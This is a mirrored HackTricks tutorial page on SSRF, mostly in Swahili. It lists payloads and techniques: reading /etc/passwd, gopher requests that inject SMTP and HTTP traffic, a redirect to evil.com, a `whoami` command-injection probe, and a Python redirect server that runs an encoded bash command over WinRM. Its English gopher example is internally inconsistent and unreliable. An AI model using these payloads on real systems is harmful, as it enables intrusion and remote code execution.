mirror of https://github.com/carlospolop/hacktricks synced 2024-11-26 22:52:06 +00:00

History

Translator 39f662f68e Translated ['README.md', 'forensics/basic-forensic-methodology/partition		2024-03-14 23:40:07 +00:00
..
cloud-ssrf.md	Translated ['README.md', 'forensics/basic-forensic-methodology/partition	2024-03-14 23:40:07 +00:00
README.md	Translated to Swahili	2024-02-11 02:13:58 +00:00
ssrf-vulnerable-platforms.md	Translated to Swahili	2024-02-11 02:13:58 +00:00
url-format-bypass.md	Translated ['README.md', 'forensics/basic-forensic-methodology/partition	2024-03-14 23:40:07 +00:00

README.md

SSRF (Server Side Request Forgery)

Tumia Trickest kujenga na kutumia taratibu za kiotomatiki zinazotumia zana za jamii ya kisasa zaidi duniani.
Pata Ufikiaji Leo:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:

Ikiwa unataka kuona kampuni yako inatangazwa kwenye HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia MPANGO WA KUJIUNGA!
Pata swag rasmi wa PEASS & HackTricks
Gundua The PEASS Family, mkusanyiko wetu wa NFTs za kipekee
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa HackTricks na HackTricks Cloud repos za github.

Taarifa Msingi

Kosa la Server-side Request Forgery (SSRF) hutokea wakati mshambuliaji anadanganya programu ya upande wa seva kufanya ombi la HTTP kwa kikoa anachochagua. Kosa hili linaweka seva wazi kwa ombi za nje zinazoongozwa na mshambuliaji.

Kukamata SSRF

Jambo la kwanza unalohitaji kufanya ni kukamata mwingiliano wa SSRF uliozalishwa na wewe. Unaweza kutumia zana kama vile:

Burp Collaborator
pingb
canarytokens
interractsh
http://webhook.site
https://github.com/teknogeek/ssrf-sheriff
http://requestrepo.com/
https://github.com/stolenusername/cowitness
https://github.com/dwisiswant0/ngocok - Burp Collaborator inayotumia ngrok

Kuepuka Vizuizi vya Majina ya Kikoa

Kawaida utagundua kuwa SSRF inafanya kazi tu kwenye vitu vichache vilivyoorodheshwa kwenye orodha nyeupe au URL. Katika ukurasa unaofuata una mkusanyiko wa mbinu za kujaribu kuepuka orodha nyeupe:

{% content-ref url="url-format-bypass.md" %} url-format-bypass.md {% endcontent-ref %}

Kuepuka kupitia upya wazi

Ikiwa seva imekingwa vizuri, unaweza kuepuka vizuizi vyote kwa kudukua Upya wazi ndani ya ukurasa wa wavuti. Kwa sababu ukurasa wa wavuti utaruhusu SSRF kwa kikoa kile kile na labda kufuata upya, unaweza kutumia Upya wazi kufanya seva iweze kupata rasilimali za ndani.
Soma zaidi hapa: https://portswigger.net/web-security/ssrf

Itifaki

file://
Mfumo wa URL file:// unarejelewa, ukielekeza moja kwa moja kwa /etc/passwd: file:///etc/passwd
dict://
Itifaki ya URL ya DICT inaelezwa kutumika kupata ufafanuzi au orodha za maneno kupitia itifaki ya DICT. Mfano uliotolewa unaelezea URL iliyoundwa ikilenga neno, database, na nambari ya kuingia maalum, pamoja na mfano wa skripti ya PHP inayoweza kutumiwa vibaya kuunganisha kwenye seva ya DICT kwa kutumia vitambulisho vilivyotolewa na mshambuliaji: dict://<generic_user>;<auth>@<generic_host>:<port>/d:<word>:<database>:<n>
SFTP://
Inatambuliwa kama itifaki ya uhamishaji salama wa faili kupitia ganda salama, mfano unatolewa kuonyesha jinsi skripti ya PHP inaweza kutumiwa vibaya kuunganisha kwenye seva mbaya ya SFTP: url=sftp://generic.com:11111/
TFTP://
Itifaki ya Uhamishaji Rahisi wa Faili, inayofanya kazi kupitia UDP, inatajwa na mfano wa skripti ya PHP iliyoundwa kutuma ombi kwa seva ya TFTP. Ombi la TFTP linatolewa kwa 'generic.com' kwenye bandari '12346' kwa faili 'TESTUDPPACKET': ssrf.php?url=tftp://generic.com:12346/TESTUDPPACKET
LDAP://
Sehemu hii inashughulikia Itifaki ya Upatikanaji wa Direshe Nuru, ikisisitiza matumizi yake kwa kusimamia na kupata huduma za habari za saraka zilizosambazwa kupitia mtandao wa IP. Wasiliana na seva ya LDAP kwenye localhost: '%0astats%0aquit' via ssrf.php?url=ldap://localhost:11211/%0astats%0aquit.
SMTP
Njia inaelezwa ya kutumia udhaifu wa SSRF kuingiliana na huduma za SMTP kwenye localhost, pamoja na hatua za kufunua majina ya kikoa ya ndani na hatua za uchunguzi zaidi kulingana na habari hiyo.

From https://twitter.com/har1sec/status/1182255952055164929
1. connect with SSRF on smtp localhost:25
2. from the first line get the internal domain name 220[ http://blabla.internaldomain.com ](https://t.co/Ad49NBb7xy)ESMTP Sendmail
3. search[ http://internaldomain.com ](https://t.co/K0mHR0SPVH)on github, find subdomains
4. connect

Curl URL globbing - Kupita kwa WAF
Ikiwa SSRF inatekelezwa na curl, curl ina kipengele kinachoitwa URL globbing ambacho kinaweza kuwa na manufaa katika kupita kwa WAFs. Kwa mfano, katika makala hii unaweza kupata mfano huu wa kupitisha njia kupitia itifaki ya file:

file:///app/public/{.}./{.}./{app/public/hello.html,flag.txt}

Gopher://
Uwezo wa itifaki ya Gopher kuweka IP, bandari, na herufi kwa mawasiliano ya seva unajadiliwa, pamoja na zana kama Gopherus na remote-method-guesser kwa kutengeneza mizigo. Matumizi mawili tofauti yanafafanuliwa:

Gopher://

Kwa kutumia itifaki hii, unaweza kuweka IP, bandari, na herufi unayotaka seva itume. Kisha, unaweza kimsingi kutumia SSRF kuwasiliana na seva yoyote ya TCP (lakini unahitaji kujua jinsi ya kuwasiliana na huduma hiyo kwanza).
Bahati nzuri, unaweza kutumia Gopherus kuunda mizigo kwa huduma kadhaa. Aidha, remote-method-guesser inaweza kutumika kuunda mizigo ya gopher kwa huduma za Java RMI.

Gopher smtp

ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
will make a request like
HELO localhost
MAIL FROM:<hacker@site.com>
RCPT TO:<victim@site.com>
DATA
From: [Hacker] <hacker@site.com>
To: <victime@site.com>
Date: Tue, 15 Sep 2017 17:20:26 -0400
Subject: Ah Ah AHYou didn't say the magic word !
.
QUIT

Gopher HTTP

Gopher is a protocol that allows the retrieval of documents over the Internet. It was popular in the early days of the web but has since been largely replaced by HTTP. However, some legacy systems still support Gopher.

Server-Side Request Forgery (SSRF) is a vulnerability that allows an attacker to make requests on behalf of the vulnerable server. One way to exploit SSRF is by using the Gopher protocol to bypass restrictions and access internal resources.

To perform a Gopher SSRF attack, follow these steps:

Identify the SSRF vulnerability in the target application.
Craft a Gopher URL that points to the desired internal resource. The Gopher URL should include the IP address or hostname of the target server, along with the port and path of the resource.
Submit the Gopher URL as part of the SSRF attack. The vulnerable server will make a request to the specified internal resource, and the response will be returned to the attacker.

Here is an example of a Gopher SSRF attack:

gopher://attacker.com:80/_GET%20/index.html%20HTTP/1.1%0D%0AHost:%20internal-server.com%0D%0A%0D%0A

In this example, the attacker's server is attacker.com, and the target internal resource is index.html on internal-server.com. The Gopher URL is crafted to make a GET request to the internal resource.

By exploiting SSRF using the Gopher protocol, an attacker can bypass network restrictions and access internal resources that should not be publicly accessible. This can lead to unauthorized access, data leakage, and other security risks.

To prevent Gopher SSRF attacks, it is important to properly validate and sanitize user input, especially when making requests to external resources. Additionally, network configurations should be carefully reviewed to ensure that internal resources are not exposed to the public internet.

#For new lines you can use %0A, %0D%0A
gopher://<server>:8080/_GET / HTTP/1.0%0A%0A
gopher://<server>:8080/_POST%20/x%20HTTP/1.0%0ACookie: eatme%0A%0AI+am+a+post+body

Gopher SMTP - Rudisha kwa 1337

{% code title="redirect.php" %}

<?php
header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
?>Now query it.
https://example.com/?q=http://evil.com/redirect.php.

{% endcode %}

SSRF kupitia kichwa cha Referrer & Wengine

Programu ya takwimu kwenye seva mara nyingi hurekodi kichwa cha Referrer ili kufuatilia viungo vinavyoingia, mazoea ambayo kwa bahati mbaya hufunua programu kwa hatari za Server-Side Request Forgery (SSRF). Hii ni kwa sababu programu kama hizo zinaweza kutembelea URL za nje zilizotajwa kwenye kichwa cha Referrer ili kuchambua maudhui ya tovuti ya rufaa. Ili kugundua hatari hizi, programu-jalizi ya Burp Suite "Collaborator Everywhere" inashauriwa, ikichangamkia njia ambayo zana za takwimu zinaprocess kichwa cha Referer ili kutambua maeneo ya mashambulizi ya SSRF yanayowezekana.

SSRF kupitia data ya SNI kutoka kwa cheti

Hitilafu ya usanidi ambayo inaweza kuwezesha uunganisho kwa backend yoyote kupitia usanidi rahisi inaonyeshwa na mfano wa usanidi wa Nginx:

stream {
server {
listen 443;
resolver 127.0.0.11;
proxy_pass $ssl_preread_server_name:443;
ssl_preread on;
}
}

Katika usanidi huu, thamani kutoka kwa uga wa Server Name Indication (SNI) hutumiwa moja kwa moja kama anwani ya backend. Usanidi huu unafunua udhaifu wa Server-Side Request Forgery (SSRF), ambao unaweza kudukuliwa kwa kutoa tu anwani ya IP au jina la kikoa kinachotaka katika uga wa SNI. Mfano wa udanganyifu wa kudhibiti uhusiano kwa backend yoyote, kama vile internal.host.com, kwa kutumia amri ya openssl inayotolewa hapa chini:

openssl s_client -connect target.com:443 -servername "internal.host.com" -crlf

Weka faili kwa kutumia Wget

SSRF na Uingizaji Amri

Inaweza kuwa na maana kujaribu mzigo kama huu: url=http://3iufty2q67fuy2dew3yug4f34.burpcollaborator.net?`whoami`

Uundaji wa PDFs

Ikiwa ukurasa wa wavuti unazalisha moja kwa moja PDF na habari fulani uliyotoa, unaweza kuweka JS ambayo itatekelezwa na muundaji wa PDF yenyewe (seva) wakati wa kuunda PDF na utaweza kutumia SSRF. Pata habari zaidi hapa.

Kutoka SSRF hadi DoS

Unda vikao kadhaa na jaribu kupakua faili nzito kwa kutumia udhaifu wa SSRF kutoka kwa vikao.

Vipengele vya PHP vya SSRF

{% content-ref url="../../network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md" %} php-ssrf.md {% endcontent-ref %}

SSRF Kuhamisha kwa Gopher

Kwa baadhi ya uchunguzi unaweza kuhitaji kutuma jibu la kuhamisha (labda kutumia itifaki tofauti kama gopher). Hapa una nambari tofauti za python za kujibu na kuhamisha:

# First run: openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl

class MainHandler(BaseHTTPRequestHandler):
def do_GET(self):
print("GET")
self.send_response(301)

self.send_header("Location", "gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20%31%30%2e%31%30%2e%31%31%2e%31%31%37%3a%35%39%38%36%0d%0a%55%73%65%72%2d%41%67%65%6e%74%3a%20%70%79%74%68%6f%6e%2d%72%65%71%75%65%73%74%73%2f%32%2e%32%35%2e%31%0d%0a%41%63%63%65%70%74%2d%45%6e%63%6f%64%69%6e%67%3a%20%67%7a%69%70%2c%20%64%65%66%6c%61%74%65%0d%0a%41%63%63%65%70%74%3a%20%2a%2f%2a%0d%0a%43%6f%6e%6e%65%63%74%69%6f%6e%3a%20%63%6c%6f%73%65%0d%0a%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%20%61%70%70%6c%69%63%61%74%69%6f%6e%2f%73%6f%61%70%2b%78%6d%6c%3b%63%68%61%72%73%65%74%3d%55%54%46%2d%38%0d%0a%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%3a%20%31%37%32%38%0d%0a%0d%0a%3c%73%3a%45%6e%76%65%6c%6f%70%65%20%78%6d%6c%6e%73%3a%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%33%2f%30%35%2f%73%6f%61%70%2d%65%6e%76%65%6c%6f%70%65%22%20%78%6d%6c%6e%73%3a%61%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%22%20%78%6d%6c%6e%73%3a%68%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%69%6e%64%6f%77%73%2f%73%68%65%6c%6c%22%20%78%6d%6c%6e%73%3a%6e%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%39%2f%65%6e%75%6d%65%72%61%74%69%6f%6e%22%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%77%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%78%73%69%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%31%2f%58%4d%4c%53%63%68%65%6d%61%22%3e%0a%20%20%20%3c%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%20%20%20%3c%61%3a%54%6f%3e%48%54%54%50%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%31%3a%35%39%38%36%2f%77%73%6d%61%6e%2f%3c%2f%61%3a%54%6f%3e%0a%20%20%20%20%20%20%3c%77%3a%52%65%73%6f%75%72%63%65%55%52%49%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%3c%2f%77%3a%52%65%73%6f%75%72%63%65%55%52%49%3e%0a%20%20%20%20%20%20%3c%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%20%20%20%3c%61%3a%41%64%64%72%65%73%73%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%2f%72%6f%6c%65%2f%61%6e%6f%6e%79%6d%6f%75%73%3c%2f%61%3a%41%64%64%72%65%73%73%3e%0a%20%20%20%20%20%20%3c%2f%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%3c%61%3a%41%63%74%69%6f%6e%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%2f%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%3c%2f%61%3a%41%63%74%69%6f%6e%3e%0a%20%20%20%20%20%20%3c%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%31%30%32%34%30%30%3c%2f%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%3e%0a%20%20%20%20%20%20%3c%61%3a%4d%65%73%73%61%67%65%49%44%3e%75%75%69%64%3a%30%41%42%35%38%30%38%37%2d%43%32%43%33%2d%30%30%30%35%2d%30%30%30%30%2d%30%30%30%30%30%30%30%31%30%30%30%30%3c%2f%61%3a%4d%65%73%73%61%67%65%49%44%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%50%54%31%4d%33%30%53%3c%2f%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%77%3a%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%70%3a%44%61%74%61%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%74%69%6f%6e%53%65%74%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%20%4e%61%6d%65%3d%22%5f%5f%63%69%6d%6e%61%6d%65%73%70%61%63%65%22%3e%72%6f%6f%74%2f%73%63%78%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%3e%0a%20%20%20%20%20%20%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%3c%2f%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%3c%73%3a%42%6f%64%79%3e%0a%20%20%20%20%20%20%3c%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%22%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%63%6f%6d%6d%61%6e%64%3e%65%63%68%6f%20%2d%6e%20%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%43%34%78%4d%43%34%78%4e%43%34%78%4d%53%38%35%4d%44%41%78%49%44%41%2b%4a%6a%45%3d%20%7c%20%62%61%73%65%36%34%20%2d%64%20%7c%20%62%61%73%68%3c%2f%70%3a%63%6f%6d%6d%61%6e%64%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%74%69%6d%65%6f%75%74%3e%30%3c%2f%70%3a%74%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%2f%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%3e%0a%20%20%20%3c%2f%73%3a%42%6f%64%79%3e%0a%3c%2f%73%3a%45%6e%76%65%6c%6f%70%65%3e%0a")
```sw
self.end_headers()

httpd = HTTPServer(('0.0.0.0', 443), MainHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="server.pem", server_side=True)
httpd.serve_forever()

from flask import Flask, redirect
from urllib.parse import quote
app = Flask(__name__)

@app.route('/')
def root():
return redirect('gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20', code=301)

if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)

Tumia Trickest kujenga na kutumia taratibu za kiotomatiki zinazotumia zana za jamii za hali ya juu zaidi duniani.
Pata Ufikiaji Leo:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

DNS Rebidding CORS/SOP bypass

Ikiwa una matatizo ya kutoa yaliyomo kutoka kwa anwani ya IP ya ndani kwa sababu ya CORS/SOP, DNS Rebidding inaweza kutumika kuzunguka kizuizi hicho:

{% content-ref url="../cors-bypass.md" %} cors-bypass.md {% endcontent-ref %}

DNS Rebidding Otomatiki

Singularity of Origin ni zana ya kutekeleza mashambulizi ya DNS rebinding. Inajumuisha sehemu muhimu za kubadilisha tena anwani ya IP ya jina la DNS la seva ya shambulio hadi anwani ya IP ya mashine ya lengo na kutumikia mzigo wa mashambulizi ili kudukua programu zenye udhaifu kwenye mashine ya lengo.

Angalia pia seva inayofanya kazi hadharani katika http://rebind.it/singularity.html

DNS Rebidding + Kitambulisho cha Kikao cha TLS/Kitambulisho cha Tiketi ya Kikao

Mahitaji:

SSRF
Vikao vya TLS vya kutoka nje
Vifaa kwenye bandari za ndani

Shambulio:

Uliza mtumiaji/roboti kupata kikoa kinachodhibitiwa na mshambuliaji
TTL ya DNS ni 0 sekunde (kwa hivyo muathirika atachunguza IP ya kikoa tena hivi karibuni)
Kuna unganisho la TLS linaloundwa kati ya muathirika na kikoa cha mshambuliaji. Mshambuliaji anaingiza mzigo ndani ya Kitambulisho cha Kikao au Tiketi ya Kikao.
Kikoa kitanza mzunguko usio na mwisho wa kurudisha tena kwa yeye mwenyewe. Lengo la hii ni kufanya mtumiaji/roboti kufikia kikoa hadi ifanye tena ombi la DNS la kikoa.
Katika ombi la DNS anwani ya IP ya kibinafsi inatolewa sasa (kwa mfano 127.0.0.1)
Mtumiaji/roboti atajaribu kuanzisha tena uhusiano wa TLS na ili kufanya hivyo itatuma Kitambulisho cha Kikao/Tiketi ya Kikao (ambapo mzigo wa mshambuliaji ulikuwa umo). Hongera umefanikiwa kuomba mtumiaji/roboti kujidukua mwenyewe.

Tambua kuwa wakati wa shambulio hili, ikiwa unataka kudukua localhost:11211 (memcache) unahitaji kufanya muathirika kuanzisha uhusiano wa awali na www.attacker.com:11211 (bandari lazima iwe sawa daima).
Kwa kutekeleza shambulio hili unaweza kutumia zana: https://github.com/jmdx/TLS-poison/
Kwa mashauri zaidi angalia mazungumzo ambapo shambulio hili linaelezwa: https://www.youtube.com/watch?v=qGpAJxfADjo&ab_channel=DEFCONConference

SSRF Kipofu

Tofauti kati ya SSRF kipofu na isiyo kipofu ni kwamba katika kipofu huwezi kuona majibu ya ombi la SSRF. Kwa hivyo, ni ngumu zaidi kudukua kwa sababu utaweza kudukua tu udhaifu unaofahamika vizuri.

SSRF Kulingana na Wakati

Kwa kuchunguza wakati wa majibu kutoka kwa seva inaweza kuwa inawezekana kujua ikiwa rasilimali ipo au la (labda inachukua muda zaidi kupata rasilimali iliyo hai kuliko kupata ile ambayo haipo)

Udukuzi wa SSRF wa Cloud

Ikiwa unapata udhaifu wa SSRF kwenye mashine inayofanya kazi ndani ya mazingira ya wingu, huenda uweze kupata habari muhimu juu ya mazingira ya wingu na hata vibali:

{% content-ref url="cloud-ssrf.md" %} cloud-ssrf.md {% endcontent-ref %}

Jukwaa Zenye Udhaifu wa SSRF

Jukwaa kadhaa maarufu lina au limekuwa na udhaifu wa SSRF, angalia katika:

{% content-ref url="ssrf-vulnerable-platforms.md" %} ssrf-vulnerable-platforms.md {% endcontent-ref %}

Zana

SSRFMap

Zana ya kugundua na kutumia udhaifu wa SSRF

Gopherus

Chapisho la blogu kuhusu Gopherus

Zana hii inazalisha mzigo wa Gopher kwa:

MySQL
PostgreSQL
FastCGI
Redis
Zabbix
Memcache

remote-method-guesser

Chapisho la blogu kuhusu matumizi ya SSRF

remote-method-guesser ni skana ya udhaifu wa Java RMI inayounga mkono operesheni za mashambulizi kwa udhaifu wa kawaida wa Java RMI. Kwa operesheni nyingi zinazopatikana, inasaidia chaguo la --ssrf, kuunda mzigo wa SSRF kwa operesheni iliyoombwa. Pamoja na chaguo la --gopher, mzigo wa gopher tayari unaweza kuzalishwa moja kwa moja.

SSRF Proxy

SSRF Proxy ni seva ya wakala ya HTTP yenye nyuzi nyingi iliyoundwa kusafirisha trafiki ya HTTP ya mteja kupitia seva za HTTP zilizo na udhaifu wa Server-Side Request Forgery (SSRF).

Kwa mazoezi

{% embed url="https://github.com/incredibleindishell/SSRF_Vulnerable_Lab" %}